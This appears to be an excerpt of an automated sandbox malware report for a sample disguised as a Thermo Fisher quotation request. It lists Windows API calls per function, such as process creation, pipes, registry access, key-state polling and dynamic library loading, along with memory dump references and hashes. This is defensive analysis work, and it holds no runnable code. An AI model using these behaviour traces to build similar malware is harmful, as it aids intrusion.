                                                                • Part of subcall function 0061D17C: GetStockObject.GDI32(00000011), ref: 0061D1CE
                                                                • Part of subcall function 0061D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0061D1D8
                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0066915C
                                                              • LoadLibraryW.KERNEL32(?), ref: 00669163
                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00669178
                                                              • DestroyWindow.USER32(?), ref: 00669180
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                              • String ID: SysAnimate32
                                                              • API String ID: 4146253029-1011021900
                                                              • Opcode ID: dec53eeba646d1611af9a0ba8ad5a2badeafdd6b5e7125303451b6346182b23d
                                                              • Instruction ID: 71c0bf6e4dfb09b38f0d61468b86bb264d604b63b4dbe5a7e1952b359226509c
                                                              • Opcode Fuzzy Hash: dec53eeba646d1611af9a0ba8ad5a2badeafdd6b5e7125303451b6346182b23d
                                                              • Instruction Fuzzy Hash: 69215E7121020ABBEF104E64DD85EFAB7AEEF9A364F200618FD5496290D771DC52A770
                                                              APIs
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00649588
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006495B9
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 006495CB
                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00649605
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: 9584cc68f95a54357d3f779ed9f0b0a167d559054892c379e0a2f0e4b476cfc2
                                                              • Instruction ID: 5687a1e1160d818a8a5c5cbbf413e072301fb58133dfac1379eeecbaa243c35a
                                                              • Opcode Fuzzy Hash: 9584cc68f95a54357d3f779ed9f0b0a167d559054892c379e0a2f0e4b476cfc2
                                                              • Instruction Fuzzy Hash: 55215CB0680205ABEB259F29DC45ADB7BFAAF85720F204A19F9A1D73D0D770D941CB30
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00649653
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00649683
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00649694
                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006496CE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: db63b99f0e8b97a71c6992ce634c8b6c1d5d836628891954829d962d13c623c6
                                                              • Instruction ID: 94cd617766e466aed3a85987821d5df46a69ab1e434d2a54cf14d77e95bc92ee
                                                              • Opcode Fuzzy Hash: db63b99f0e8b97a71c6992ce634c8b6c1d5d836628891954829d962d13c623c6
                                                              • Instruction Fuzzy Hash: B4217A71680205ABEB209F698C44EDB77AAAF95720F210B18F9A1E33D0E6709D41CB30
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0064DB0A
                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0064DB5E
                                                              • __swprintf.LIBCMT ref: 0064DB77
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0069DC00), ref: 0064DBB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                              • String ID: %lu
                                                              • API String ID: 3164766367-685833217
                                                              • Opcode ID: 679bf65d162c0c2178002902691745c7947bdef9f63e843f057dfe3b1012d23e
                                                              • Instruction ID: 76337d21983d4b7825c2c5d5a03316b82467fd2005eadd57dcfc1506b8f7e90c
                                                              • Opcode Fuzzy Hash: 679bf65d162c0c2178002902691745c7947bdef9f63e843f057dfe3b1012d23e
                                                              • Instruction Fuzzy Hash: 92218375A00108AFCB50EFA4D985DAEBBBAEF89714B004069F505E7391DB70EA41CB65
                                                              APIs
                                                                • Part of subcall function 0063C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0063C84A
                                                                • Part of subcall function 0063C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0063C85D
                                                                • Part of subcall function 0063C82D: GetCurrentThreadId.KERNEL32 ref: 0063C864
                                                                • Part of subcall function 0063C82D: AttachThreadInput.USER32(00000000), ref: 0063C86B
                                                              • GetFocus.USER32 ref: 0063CA05
                                                                • Part of subcall function 0063C876: GetParent.USER32(?), ref: 0063C884
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0063CA4E
                                                              • EnumChildWindows.USER32(?,0063CAC4), ref: 0063CA76
                                                              • __swprintf.LIBCMT ref: 0063CA90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                              • String ID: %s%d
                                                              • API String ID: 3187004680-1110647743
                                                              • Opcode ID: 11e9a5d5818ca1771591452cedb18b58a1cf1b549be473d903e9266c50090de6
                                                              • Instruction ID: b3babfa62d58d8ff99490d0b7f580a71a746cf26974854e07e51b30d76e100fe
                                                              • Opcode Fuzzy Hash: 11e9a5d5818ca1771591452cedb18b58a1cf1b549be473d903e9266c50090de6
                                                              • Instruction Fuzzy Hash: A61172716002097BCF55BF64DC85FEA3B7EAF44714F00806AFA08BA182DB709645DBB4
                                                              APIs
                                                              • __lock.LIBCMT ref: 00627AD8
                                                                • Part of subcall function 00627CF4: __mtinitlocknum.LIBCMT ref: 00627D06
                                                                • Part of subcall function 00627CF4: EnterCriticalSection.KERNEL32(00000000,?,00627ADD,0000000D), ref: 00627D1F
                                                              • InterlockedIncrement.KERNEL32(?), ref: 00627AE5
                                                              • __lock.LIBCMT ref: 00627AF9
                                                              • ___addlocaleref.LIBCMT ref: 00627B17
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                              • String ID: `h
                                                              • API String ID: 1687444384-218911116
                                                              • Opcode ID: 370e1a6e1a4a15da6f429087894c228a928713523e35a8a62aff904840c8c298
                                                              • Instruction ID: 16dc1bb4e815e9879ec07fc51d658f0a95d8abced537fe42cfd55caf0521f204
                                                              • Opcode Fuzzy Hash: 370e1a6e1a4a15da6f429087894c228a928713523e35a8a62aff904840c8c298
                                                              • Instruction Fuzzy Hash: 67016171504B109FD760DF75E905749BBF2AF50321F20490EA496972A1CB70A684CF55
                                                              APIs
                                                              • _memset.LIBCMT ref: 0066E33D
                                                              • _memset.LIBCMT ref: 0066E34C
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006C3D00,006C3D44), ref: 0066E37B
                                                              • CloseHandle.KERNEL32 ref: 0066E38D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseCreateHandleProcess
                                                              • String ID: D=l
                                                              • API String ID: 3277943733-2789120451
                                                              • Opcode ID: ca474571870524d945687e3b952abf35fc6c06ab1542d9490b56465c23d1ba71
                                                              • Instruction ID: 3fec747c792c2ebbd858ff55af9870fe54664813bade937f8f7586ba42a430b1
                                                              • Opcode Fuzzy Hash: ca474571870524d945687e3b952abf35fc6c06ab1542d9490b56465c23d1ba71
                                                              • Instruction Fuzzy Hash: C7F05EF5540324BAF3102B60AC49FB77E6EDF04754F009425BE0AE62A2D776AE0087B8
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006619F3
                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00661A26
                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00661B49
                                                              • CloseHandle.KERNEL32(?), ref: 00661BBF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                              • String ID:
                                                              • API String ID: 2364364464-0
                                                              • Opcode ID: b7c0faf060f268f8ae02ceb91f72b2b2164d7933cb2edc012c8ba3448a4da1e8
                                                              • Instruction ID: a221404d85a1bfa6dab5f804d82ee7573224c685256643cf861648afa5f45858
                                                              • Opcode Fuzzy Hash: b7c0faf060f268f8ae02ceb91f72b2b2164d7933cb2edc012c8ba3448a4da1e8
                                                              • Instruction Fuzzy Hash: EA8194B0600205ABDF54DF64C896BEDBBE6BF05720F188459FA05AF3C2D7B4A941CB94
                                                              APIs
                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0066E1D5
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0066E20D
                                                              • IsDlgButtonChecked.USER32(?,00000001), ref: 0066E248
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0066E269
                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0066E281
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ButtonCheckedLongWindow
                                                              • String ID:
                                                              • API String ID: 3188977179-0
                                                              • Opcode ID: 3418bf08cbb872eecc8d9828a338faf92f7811c2854f561dca1f8de3037496df
                                                              • Instruction ID: 8df02901b3555921b846a4d55e8e8fd32ea89ffac7d5c8b50f34946795ca75e7
                                                              • Opcode Fuzzy Hash: 3418bf08cbb872eecc8d9828a338faf92f7811c2854f561dca1f8de3037496df
                                                              • Instruction Fuzzy Hash: 58618138A00204AFDB25CF58C855FFABBBBEF4A300F144159F9599B3A1C772A951DB10
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00641CB4
                                                              • VariantClear.OLEAUT32(00000013), ref: 00641D26
                                                              • VariantClear.OLEAUT32(00000000), ref: 00641D81
                                                              • VariantClear.OLEAUT32(?), ref: 00641DF8
                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00641E26
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Variant$Clear$ChangeInitType
                                                              • String ID:
                                                              • API String ID: 4136290138-0
                                                              • Opcode ID: 8c18c91d4de652d2858a3a535059bc0ab6b4e66b6da6ce8b1ef1360b5542f55f
                                                              • Instruction ID: 9f15c1ab694b67172f156cd7623b6fd186b1d6348461e660614d61ed8b2dc2a5
                                                              • Opcode Fuzzy Hash: 8c18c91d4de652d2858a3a535059bc0ab6b4e66b6da6ce8b1ef1360b5542f55f
                                                              • Instruction Fuzzy Hash: E05147B5A00209AFDB14CF58C880AAAB7FAFF4D314B158559ED59DB340E730EA51CFA0
                                                              APIs
                                                                • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
                                                                • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
                                                              • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 006606EE
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0066077D
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0066079B
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 006607E1
                                                              • FreeLibrary.KERNEL32(00000000,00000004), ref: 006607FB
                                                                • Part of subcall function 0061E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0064A574,?,?,00000000,00000008), ref: 0061E675
                                                                • Part of subcall function 0061E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0064A574,?,?,00000000,00000008), ref: 0061E699
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 327935632-0
                                                              • Opcode ID: ab67289076a11fc0ac4000732fcb3d91c537b7186db2947ac6d86d6d6ad95b48
                                                              • Instruction ID: 191d97571c81dbae0bdc81f6590c161e03e10db6d9c735a83d87c401981bf9d9
                                                              • Opcode Fuzzy Hash: ab67289076a11fc0ac4000732fcb3d91c537b7186db2947ac6d86d6d6ad95b48
                                                              • Instruction Fuzzy Hash: 12517C75A00205EFDB04EFA8C480DEEB7B6BF48310B048169EA55AB392DB30ED41CF94
                                                              APIs
                                                                • Part of subcall function 00663C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00662BB5,?,?), ref: 00663C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00662EEF
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00662F2E
                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00662F75
                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00662FA1
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00662FAE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                              • String ID:
                                                              • API String ID: 3740051246-0
                                                              • Opcode ID: eaa9cc5fb8c9010e07d7b4422e757a16fb02ae9b33119b03f78b9f73bb3e657d
                                                              • Instruction ID: 068252b19bd1625c5467b81ea3a8a2f832d4b720a594db86981a9f28e2929b3f
                                                              • Opcode Fuzzy Hash: eaa9cc5fb8c9010e07d7b4422e757a16fb02ae9b33119b03f78b9f73bb3e657d
                                                              • Instruction Fuzzy Hash: 79518B71248205AFC748EF64C891EABB7FAFF88314F00892DF595972A1DB70E905CB56
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 074517803679dc364b0b294edd65a9a27b9d9fca986451d23147e12bd94e90d2
                                                              • Instruction ID: 13153a740ccafdaa0dea6b60154b7aca24052c44c048ce43f94e814cdac4b614
                                                              • Opcode Fuzzy Hash: 074517803679dc364b0b294edd65a9a27b9d9fca986451d23147e12bd94e90d2
                                                              • Instruction Fuzzy Hash: BC419279900904BFD710DF68CC44FF9BB7AEF4A320F140265E999A72E1C671AD51DA60
                                                              APIs
                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006512B4
                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 006512DD
                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0065131C
                                                                • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
                                                                • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00651341
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00651349
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1389676194-0
                                                              • Opcode ID: abc6d71f10abe00429ac4847f8381c4f9b15eb4a5a34173ba81e72e66d102006
                                                              • Instruction ID: bdc191ed9e8b0f4bc760a681a9d65a2633f26253734e205e9e89c25eab26ec4a
                                                              • Opcode Fuzzy Hash: abc6d71f10abe00429ac4847f8381c4f9b15eb4a5a34173ba81e72e66d102006
                                                              • Instruction Fuzzy Hash: F4413C35600105DFCB45EF64C991AAEBBF6FF09310B148099E946AB3A2DB31ED41CF64
                                                              APIs
                                                              • GetCursorPos.USER32(000000FF), ref: 0061B64F
                                                              • ScreenToClient.USER32(00000000,000000FF), ref: 0061B66C
                                                              • GetAsyncKeyState.USER32(00000001), ref: 0061B691
                                                              • GetAsyncKeyState.USER32(00000002), ref: 0061B69F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AsyncState$ClientCursorScreen
                                                              • String ID:
                                                              • API String ID: 4210589936-0
                                                              • Opcode ID: 27430b2c71c9031235517ca912f3d558fa83befb7bb977f09cd63536acda9aeb
                                                              • Instruction ID: dd1feac3c188bcb871196f77a46e367d08a09ea1a1feaafd2440eed60589cca1
                                                              • Opcode Fuzzy Hash: 27430b2c71c9031235517ca912f3d558fa83befb7bb977f09cd63536acda9aeb
                                                              • Instruction Fuzzy Hash: BA416B31604219FFCF159F64C844AEDBBB6BF15324F24831AF82996290CB35AD94DFA1
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 0063B369
                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 0063B413
                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0063B41B
                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 0063B429
                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0063B431
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
